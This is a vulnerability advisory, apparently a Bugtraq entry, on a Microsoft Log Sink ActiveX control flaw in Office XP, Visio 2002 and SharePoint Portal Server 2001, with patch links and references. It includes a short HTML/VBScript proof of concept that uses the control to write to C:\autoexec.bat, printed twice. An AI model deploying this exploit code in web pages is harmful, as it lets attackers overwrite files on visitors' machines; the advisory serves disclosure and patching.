Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability
BID:12646
Info
Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability
| Bugtraq ID: | 12646 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 29 2003 12:00AM |
| Updated: | Apr 29 2003 12:00AM |
| Credit: | This vulnerability was originally announced by the vendor, the issue was also independently discovered by Shane Hird <[email protected]>. |
| Vulnerable: |
Microsoft Visio 2002 SP1 Microsoft Visio 2002 Microsoft SharePoint Portal Server 2001 SP1 Microsoft SharePoint Portal Server 2001 Microsoft Office XP SP3 Microsoft Office XP SP2 Microsoft Office XP SP1 Microsoft Office XP |
| Not Vulnerable: |
Microsoft Visio 2002 SP2 Microsoft SharePoint Portal Server 2001 SP3 Microsoft SharePoint Portal Server 2001 SP2A Microsoft SharePoint Portal Server 2001 SP2 |
Discussion
Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability
Microsoft Log Sink Class ActiveX control can allow remote attackers to create arbitrary files on an affected computer.
A remote attacker can exploit this issue by crafting a malicious Web site that triggers this vulnerability and enticing a user to visit the site. If successful, the attacker may create arbitrary files on the computer. This may lead to various attacks including arbitrary code execution.
Microsoft Log Sink Class ActiveX control can allow remote attackers to create arbitrary files on an affected computer.
A remote attacker can exploit this issue by crafting a malicious Web site that triggers this vulnerability and enticing a user to visit the site. If successful, the attacker may create arbitrary files on the computer. This may lead to various attacks including arbitrary code execution.
Exploit / POC
Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability
The following exmploit code is available:
<object id=ctl
classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object>
<script language="vbscript">
ctl.initsink "C:\autoexec.bat"
ctl.addstring "echo Drive formatted? ", ""
ctl.deinitsink
</script>
The following exmploit code is available:
<object id=ctl
classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object>
<script language="vbscript">
ctl.initsink "C:\autoexec.bat"
ctl.addstring "echo Drive formatted? ", ""
ctl.deinitsink
</script>
Solution / Fix
Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability
Solution:
Microsoft has released various knowledge base articles and upgrades to address this issue in affected products. Visio 2002 Service Pack 2 and SharePoint Portal Server 2001 Service Pack 2A are not affected by this vulnerability.
Microsoft Office XP SP3
Microsoft Office XP SP1
Microsoft Office XP SP2
Microsoft Office XP
Solution:
Microsoft has released various knowledge base articles and upgrades to address this issue in affected products. Visio 2002 Service Pack 2 and SharePoint Portal Server 2001 Service Pack 2A are not affected by this vulnerability.
Microsoft Office XP SP3
-
Microsoft Office XP Update: KB837253
http://www.microsoft.com/downloads/details.aspx?familyid=0dd4c99a-9196 -421b-83f0-3d2f93189028&displaylang=en
Microsoft Office XP SP1
-
Microsoft Office XP Update: KB837253
http://www.microsoft.com/downloads/details.aspx?familyid=0dd4c99a-9196 -421b-83f0-3d2f93189028&displaylang=en
Microsoft Office XP SP2
-
Microsoft Office XP Update: KB837253
http://www.microsoft.com/downloads/details.aspx?familyid=0dd4c99a-9196 -421b-83f0-3d2f93189028&displaylang=en
Microsoft Office XP
-
Microsoft Office XP Update: KB837253
http://www.microsoft.com/downloads/details.aspx?familyid=0dd4c99a-9196 -421b-83f0-3d2f93189028&displaylang=en
References
Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability
References:
References:
- Knowledge Base Article - 321780 (Microsoft)
- Knowledge Base Article - 830242 Description of Visio 2002 Service Pack 2 (Microsoft)
- Knowledge Base Article - 837253 Description of the Office XP Update (Microsoft)
- SharePoint Portal Server 2001 Service Pack 2A (Microsoft)
- Vulnerability Note VU#165022 (CERT)